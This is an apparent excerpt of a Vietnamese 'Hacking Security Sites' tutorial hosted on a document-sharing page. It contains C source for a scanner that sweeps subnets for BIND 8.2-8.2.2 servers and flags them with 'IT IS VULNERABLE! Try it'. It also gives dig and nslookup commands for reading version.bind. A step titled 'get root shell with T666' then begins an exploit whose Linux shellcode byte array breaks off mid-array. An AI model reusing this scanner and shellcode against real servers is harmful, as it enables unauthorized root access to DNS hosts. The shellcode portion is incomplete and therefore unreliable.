
Hacking Security Sites part 36 pptx


THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Hacking Security Sites Part 36
Trường học Standard University
Chuyên ngành Computer Science
Thể loại Bài luận
Năm xuất bản 2000
Thành phố Hanoi
Định dạng
Số trang 10
Dung lượng 94,43 KB


Nội dung


if( (name[0] <= '0') || (name[0] >= '9') )

{

host_entry = gethostbyname( name );

if( host_entry == NULL )

{

if( option[0] != 1 ) {

printf( "Can not scan %s.\n", name );

exit(0);

}

}

if( option[0] != 1 ) {

addr = *((struct in_addr *)host_entry->h_addr);

ip = (unsigned char *)inet_ntoa( addr );

subnet = GetSubnet( ip );

}

}

if( (name[0] >= '0') && (name[0] <= '9') )

{

host_entry = gethostbyaddr( name, strlen(name), AF_INET ); if( host_entry == NULL )

{

if( option[0] != 1 ) {

printf( "Can not scan %s.\n", name );

exit(0);

}

}

if( option[0] != 1 ) {

addr = *((struct in_addr *)host_entry->h_addr);

ip = (unsigned char *)inet_ntoa( addr );

subnet = GetSubnet( ip );

}

}

if( (option[1] == 0) && (option[2] == 0) && (option[0] != 1) ) {

Scan( ip );

printf( "Scanning Done.\n" );

remove( R1_DIR );

remove( R2_DIR );

exit(0);

}

if( option[1] == 1 )

{


for( i = 0; i < 256; i++ )

{

if( fork() == 0 )

{

strcpy( subnet, itoa( i ) );

ip_s = ChangeSubnet( ip, subnet ); Scan( ip_s );

remove( R1_DIR );

remove( R2_DIR );

exit(0);

} else {

wait( NULL );

}

continue;

}

printf( "Scanning Done.\n" );

exit(0);

}

if( option[2] == 1 )

{

strcpy( cmd, SCAN_EXE );

strcat( cmd, name );

strcat( cmd, "/24" );

strcat( cmd, " > " );

strcat( cmd, R1_DIR );

chdir( SCAN_DIR );

system( cmd );

strcpy( cmd, "grep \"Interesting\" " ); strcat( cmd, R1_DIR );

strcat( cmd, " > " );

strcat( cmd, R2_DIR );

system( cmd );

if( ( fp = fopen( R2_DIR, "r" ) ) < 0 ) {

printf( "File Open Error!\n" );

exit(0);

}

while( 1 )

{

bzero( name, 200 );


temp = (char *)malloc( 200 );

strcpy( temp, " " );

temp = fgets( temp, 100, fp );

if( temp == NULL ) break;

if( temp[21] == ' ' )

{

for( i = 0; i < 16; i++ )

{

if( (temp[i+23] != ' ') && (temp[i+23] != ')') )

{

if( (temp[i+23] >= '0') && (temp[i+23] <= '9') )

{

name[i] = temp[i+23];

} else {

if( temp[i+23] == '.' )

name[i] = temp[i+23];

}

}

}

}

if( temp[21] != ' ' )

{

for( i = 0; i < 50; i++ )

{

if( temp[i+21] != ' ' ) name[i] = temp[i+21];

}

}

Scan( name );

free(temp);

}

remove( R1_DIR );

remove( R2_DIR );

}

if( option[0] == 1 )

{

printf( "Creator : Laks Bluesky\n" );

printf( "E-mail : <a

href="mailto:lb0gspm@hanmail.net">lb0gspm@hanmail.net</a>\n\n" ); printf( "Version : 2.00 beta\n\n" );

printf( "2000.06.19\n" );

exit(0);


}

}

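/*
 * Convert an integer to a newly allocated decimal string.
 *
 * The earlier version only produced correct output for 0..999: larger or
 * negative values yielded non-digit characters, and the allocation result
 * was used without a check.  This version handles the full int range.
 *
 * The returned buffer is always at least 4 bytes, matching the size the
 * original always allocated.
 *
 * Returns NULL if the allocation fails.  The caller owns the buffer and
 * must free() it.
 */
char *itoa( int i )
{
    char digits[12];    /* sign + 10 digits; assumes int is at most 32 bits */
    char *ret;
    size_t len = 0;
    size_t need;
    size_t k;
    unsigned int mag;

    /* Work on the unsigned magnitude so the most negative int cannot overflow. */
    mag = ( i < 0 ) ? 0u - (unsigned int)i : (unsigned int)i;

    /* Emit digits least-significant first; do/while so that 0 yields "0". */
    do {
        digits[len++] = (char)( '0' + (int)( mag % 10u ) );
        mag /= 10u;
    } while( mag != 0u );

    if( i < 0 )
        digits[len++] = '-';

    need = len + 1;
    if( need < 4 )
        need = 4;       /* keep the original minimum buffer size */

    ret = malloc( need );
    if( ret == NULL )
        return NULL;

    /* Reverse into the result and terminate. */
    for( k = 0; k < len; k++ )
        ret[k] = digits[len - 1 - k];
    ret[len] = '\0';

    return ret;
}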

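/*
 * Build a copy of a dotted-quad address with its last field replaced.
 *
 * ip     - text containing at least three '.' separators
 * subnet - replacement text for the part after the third '.'; at most its
 *          first three characters are used
 *
 * The earlier version copied `ip` into a 16-byte buffer with an unbounded
 * strcpy, searched for the third '.' without stopping at the terminator,
 * and always copied four bytes from `subnet` even when it was shorter.
 * All three could read or write outside the buffers involved.
 *
 * Returns a 16-byte heap buffer holding the new string, or NULL when an
 * argument is NULL, `ip` has fewer than three dots, the result would not
 * fit in 16 bytes, or allocation fails.  The caller owns the buffer.
 */
char *ChangeSubnet( char *ip, char *subnet )
{
    enum { IP_BUF_LEN = 16 };   /* "255.255.255.255" plus terminator */
    char *ip_s;
    size_t prefix = 0;          /* length of ip up to and including the 3rd dot */
    size_t sublen = 0;
    int dots = 0;

    if( ip == NULL || subnet == NULL )
        return NULL;

    /* Walk to just past the third dot, never past the terminator. */
    while( ip[prefix] != '\0' && dots < 3 )
    {
        if( ip[prefix] == '.' )
            dots++;
        prefix++;
    }
    if( dots < 3 )
        return NULL;

    /* Use at most three characters of the replacement field. */
    while( sublen < 3 && subnet[sublen] != '\0' )
        sublen++;

    if( prefix + sublen + 1 > IP_BUF_LEN )
        return NULL;

    ip_s = malloc( IP_BUF_LEN );
    if( ip_s == NULL )
        return NULL;

    memcpy( ip_s, ip, prefix );
    memcpy( ip_s + prefix, subnet, sublen );
    ip_s[prefix + sublen] = '\0';

    return ip_s;
}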

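/*
 * Return the text that follows the third '.' of a dotted-quad string.
 *
 * The earlier version kept scanning for dots past the end of the string
 * when fewer than three were present, and always copied four bytes after
 * the third dot even when the string ended sooner.  Both read outside the
 * input.  The result was also not guaranteed to be terminated.
 *
 * Returns a zero-filled 4-byte heap buffer holding up to three characters
 * and a terminator.  The buffer holds an empty string when `ip` is NULL or
 * has fewer than three dots.  Returns NULL only if allocation fails.  The
 * caller owns the buffer.
 */
char *GetSubnet( char *ip )
{
    char *ret;
    size_t i = 0;
    size_t k = 0;
    int dots = 0;

    /* calloc keeps the result terminated whatever is copied below. */
    ret = calloc( 4, 1 );
    if( ret == NULL )
        return NULL;

    if( ip == NULL )
        return ret;

    /* Advance to just past the third dot, never past the terminator. */
    while( ip[i] != '\0' && dots < 3 )
    {
        if( ip[i] == '.' )
            dots++;
        i++;
    }
    if( dots < 3 )
        return ret;

    /* Copy at most three characters of the final field. */
    while( k < 3 && ip[i + k] != '\0' )
    {
        ret[k] = ip[i + k];
        k++;
    }

    return ret;
}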

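/*
 * Ask one name server for its self-reported BIND version and print a
 * notice when it equals "8.2", "8.2.1" or "8.2.2".
 *
 * Steps: run `dig @<ip> version.bind chaos txt` into R1_DIR, grep the
 * VERSION.BIND line into R2_DIR, skip the first 29 characters of that file
 * and read the quoted version string that follows.
 *
 * R1_DIR, R2_DIR and CBIND_DIR are defined outside this block.
 *
 * Always returns 0 and always finishes with chdir( CBIND_DIR ), as the
 * original did on every path.
 *
 * Defects fixed relative to the earlier version:
 *  - `ip` was pasted into a shell command unchecked, so shell
 *    metacharacters in a host name (from the command line or from parsed
 *    scanner output) would be run by system().  It is now restricted to
 *    host-name characters.
 *  - The command was assembled with strcat into a 200-byte heap buffer
 *    with no length check; snprintf with a truncation check is used.
 *  - fopen() was tested with `>= 0`, which is true for NULL, so a failed
 *    open went on to fgetc(NULL).  The stat() result was used unchecked.
 *  - The 9-byte version buffer was only terminated when a '"' was seen,
 *    so strcmp could read past it.  EOF was not detected.
 *  - cmd, version and the FILE handle were never released.
 *
 * NOTE(review): R1_DIR/R2_DIR are fixed paths, so two concurrent runs would
 * overwrite each other's results.  If they live in a shared writable
 * directory they should be replaced with mkstemp()-style files; this
 * cannot be confirmed from this block.
 * NOTE(review): version.bind is whatever the server chooses to report, so
 * a match is a prompt to verify and patch, not proof of exposure.
 */
int Scan( char *ip )
{
    static const char *const flagged[] = { "8.2", "8.2.1", "8.2.2" };
    char cmd[200];
    char version[10];       /* up to 9 characters plus terminator */
    struct stat result;
    FILE *fp;
    size_t k;
    int c;
    int n;

    /* Refuse anything that is not a plain host name or dotted address.
     * A leading '-' is rejected so it cannot be read as an option. */
    if( ip == NULL || ip[0] == '\0' || ip[0] == '-' )
        goto done;
    for( k = 0; ip[k] != '\0'; k++ )
    {
        char ch = ip[k];
        int ok = ( ch >= '0' && ch <= '9' ) || ( ch >= 'a' && ch <= 'z' ) ||
                 ( ch >= 'A' && ch <= 'Z' ) || ch == '.' || ch == '-' || ch == '_';
        if( !ok )
        {
            printf( "Can not scan %s.\n", ip );
            goto done;
        }
    }

    printf( "Scanning %s\n", ip );

    /* Step 1: raw query output -> R1_DIR. */
    n = snprintf( cmd, sizeof cmd, "dig @%s version.bind chaos txt > %s 2> /dev/null",
                  ip, R1_DIR );
    if( n < 0 || (size_t)n >= sizeof cmd )
        goto done;
    system( cmd );

    /* Step 2: keep only the VERSION.BIND line -> R2_DIR. */
    n = snprintf( cmd, sizeof cmd, "grep \"VERSION.BIND.\" %s > %s", R1_DIR, R2_DIR );
    if( n < 0 || (size_t)n >= sizeof cmd )
        goto done;
    system( cmd );

    /* Fewer than 30 bytes cannot hold the 29-character prefix plus a value. */
    if( stat( R2_DIR, &result ) != 0 || result.st_size < 30 )
        goto done;

    fp = fopen( R2_DIR, "r" );
    if( fp == NULL )
        goto done;

    /* Skip the fixed-width prefix that precedes the quoted version. */
    for( k = 0; k < 29; k++ )
    {
        if( fgetc( fp ) == EOF )
            break;
    }

    /* Read up to nine characters, stopping at the closing quote or EOF. */
    for( k = 0; k < 9; k++ )
    {
        c = fgetc( fp );
        if( c == EOF || c == '"' )
            break;
        version[k] = (char)c;
    }
    version[k] = '\0';
    fclose( fp );

    /* "8.2.2-P5", "8.1.2" and every other value fall through silently. */
    for( k = 0; k < sizeof flagged / sizeof flagged[0]; k++ )
    {
        if( strcmp( version, flagged[k] ) == 0 )
        {
            printf( "%s: IT IS VULNERABLE! ", ip );
            printf( "Try it \n" );
            break;
        }
    }

done:
    chdir( CBIND_DIR );
    return 0;
}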

* Bạn có thể dùng hai tiện ích sẵn có trong Linux là DIG và NSLOOKUP để nhận diện version của BIND

NSLOOKUP

# nslookup

Default Server: ns.yourco.bogus

Address: 333.333.333.333

> set class=chaos

> set type=txt

> version.bind

Server: ns.yourco.bogus

Address: 333.333.333.333


VERSION.BIND text = "8.2.2-P5"

>

DIG (cú pháp lệnh: dig @<server_ip> <domain> <query-type> <query-class>)

dig version.bind txt chaos @<server>

hoặc

dig @<server> txt chaos version.bind

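Nếu bạn thấy trên màn hình 8.2 hoặc 8.2.2 nghĩa là server này có thể gặp bug "nxt". Lưu ý: chuỗi version.bind do chính server tự khai báo và quản trị viên có thể đổi hoặc ẩn nó (tuỳ chọn `version` trong named.conf), nên kết quả này chỉ là dấu hiệu cần kiểm tra và vá, chưa phải bằng chứng chắc chắn.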

Bước 2: lấy root shell bằng T666

#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <signal.h>#include

<time.h>#include <string.h>#include <ctype.h>#include <sys/types.h>#include

<sys/socket.h>#include <netinet/in.h>#include <arpa/inet.h>#include

<arpa/nameser.h>#include <netdb.h>

char linuxcode[]=

{0xe9,0xac,0x1,0x0,0x0,0x5e,0x89,0x76,0xc,0x8d,0x46,0x8,0x89,0x46,0x10,0x8d, 0x46,0x2e,0x89,0x46,0x14,0x56,0xeb,0x54,0x5e,0x89,0xf3,0xb9,0x0,0x0,0x0,0x0, 0xba,0x0,0x0,0x0,0x0,0xb8,0x5,0x0,0x0,0x0,0xcd,0x80,0x50,0x8d,0x5e,0x2,0xb9, 0xff,0x1,0x0,0x0,0xb8,0x27,0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0x2,0xb8,0x3d,0x0, 0x0,0x0,0xcd,0x80,0x5b,0x53,0xb8,0x85,0x0,0x0,0x0,0xcd,0x80,0x5b,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x8d,0x5e,0xb,0xb8,0xc,0x0,0x0,0x0,0xcd,0x80,0x89,0xf3, 0xb8,0x3d,0x0,0x0,0x0,0xcd,0x80,0xeb,0x2c,0xe8,0xa7,0xff,0xff,0xff,0x2e,0x0, 0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x0,0x5e,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x89, 0xc0,0x85,0xc0,0xf,0x85,0x8e,0x0,0x0,0x0,0x89,0xf3,0x8d,0x4e,0xc,0x8d,0x56, 0x18,0xb8,0xb,0x0,0x0,0x0,0xcd,0x80,0xb8,0x1,0x0,0x0,0x0,0xcd,0x80,0xe8,0x75, 0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x68,0x69,0x73,0x69,0x73, 0x73,0x6f,0x6d,0x65,0x74,0x65,0x6d,0x70,0x73,0x70,0x61,0x63,0x65,0x66,0x6f, 0x72,0x74,0x68,0x65,0x73,0x6f,0x63,0x6b,0x69,0x6e,0x61,0x64,0x64,0x72,0x69, 0x6e,0x79,0x65,0x61,0x68,0x79,0x65,0x61,0x68,0x69,0x6b,0x6e,0x6f,0x77,0x74, 0x68,0x69,0x73,0x69,0x73,0x6c,0x61,0x6d,0x65,0x62,0x75,0x74,0x61,0x6e,0x79, 0x77,0x61,0x79,0x77,0x68,0x6f,0x63,0x61,0x72,0x65,0x73,0x68,0x6f,0x72,0x69, 0x7a,0x6f,0x6e,0x67,0x6f,0x74,0x69,0x74,0x77,0x6f,0x72,0x6b,0x69,0x6e,0x67, 0x73,0x6f,0x61,0x6c,0x6c,0x69,0x73,0x63,0x6f,0x6f,0x6c,0xeb,0x86,0x5e,0x56, 0x8d,0x46,0x8,0x50,0x8b,0x46,0x4,0x50,0xff,0x46,0x4,0x89,0xe1,0xbb,0x7,0x0, 0x0,0x0,0xb8,0x66,0x0,0x0,0x0,0xcd,0x80,0x83,0xc4,0xc,0x89,0xc0,0x85,0xc0, 0x75,0xda,0x66,0x83,0x7e,0x8,0x2,0x75,0xd3,0x8b,0x56,0x4,0x4a,0x52,0x89,0xd3, 0xb9,0x0,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x1,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0x5a,0x52,0x89,0xd3, 0xb9,0x2,0x0,0x0,0x0,0xb8,0x3f,0x0,0x0,0x0,0xcd,0x80,0xeb,0x12,0x5e,0x46, 
0x46,0x46,0x46,0x46,0xc7,0x46,0x10,0x0,0x0,0x0,0x0,0xe9,0xfe,0xfe,0xff,0xff, 0xe8,0xe9,0xff,0xff,0xff,0xe8,0x4f,0xfe,0xff,0xff,0x2f,0x62,0x69,0x6e,0x2f,


 

Ngày đăng: 01/07/2014, 17:20
